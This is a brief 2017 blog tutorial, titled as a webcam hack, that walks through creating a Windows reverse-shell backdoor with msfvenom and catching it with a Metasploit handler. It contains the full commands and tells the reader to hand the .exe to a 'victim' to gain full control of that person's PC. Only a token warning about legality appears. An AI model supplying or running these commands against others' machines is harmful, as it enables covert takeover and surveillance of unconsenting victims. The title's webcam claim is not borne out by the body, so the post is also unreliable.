Hack any webcam by Kali Linux !

June 02, 2017



WARNING : HACKING IS A CRIME, USE IT FOR ETHICAL HACKING PURPOSE!

Hi, Today I'll show you how to hack Windows by using Kali Linux.



WONDERING WHAT KALI LINUX IS ?


Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools which are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics and Reverse Engineering. source

THE STEPS

After installing and updating Kali (We will discuss this later)
Open your terminal and write this code to create the backdoor .exe program :

msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP HERE LPORT=4444 -f exe > NameOfProgram.exe
The backdoor will be created, give it to the victim. Once he opens it you will have full control of his PC

Now let's connect to our backdoor program, Write this code at terminal :

msfconsole
use multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost IP HERE
set lport 4444
exploit 
Relax we are done! now you are waiting for him to open the .exe program

Once you connect to the program, write
help
to access  the commands list.




You Might Also Like

0 comments